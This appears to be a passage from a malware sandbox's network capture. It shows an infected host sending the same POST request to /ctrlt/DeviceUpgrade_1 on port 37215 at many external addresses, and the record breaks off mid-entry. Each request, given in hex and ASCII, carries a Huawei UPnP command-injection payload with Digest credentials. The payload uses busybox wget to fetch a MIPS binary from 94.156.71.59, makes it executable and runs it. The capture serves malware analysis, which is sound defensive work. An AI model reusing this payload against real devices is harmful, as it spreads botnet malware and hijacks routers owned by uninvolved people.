20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            953192.168.2.1333304197.118.203.14837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.363969088 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            954192.168.2.1332976156.173.157.2437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.365788937 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            955192.168.2.1346682156.72.176.22437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.367468119 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            956192.168.2.1339212197.216.185.1537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.368874073 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            957192.168.2.1355874197.31.247.21437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.370300055 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            958192.168.2.1358932156.236.52.25037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.371577978 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            959192.168.2.1347552156.194.120.5137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.372850895 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            960192.168.2.135794641.250.61.21737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.376230955 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            961192.168.2.1350772156.140.171.17937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.378528118 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            962192.168.2.1352658197.88.172.9637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.380127907 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            963192.168.2.1342090156.20.166.16837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.381778955 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
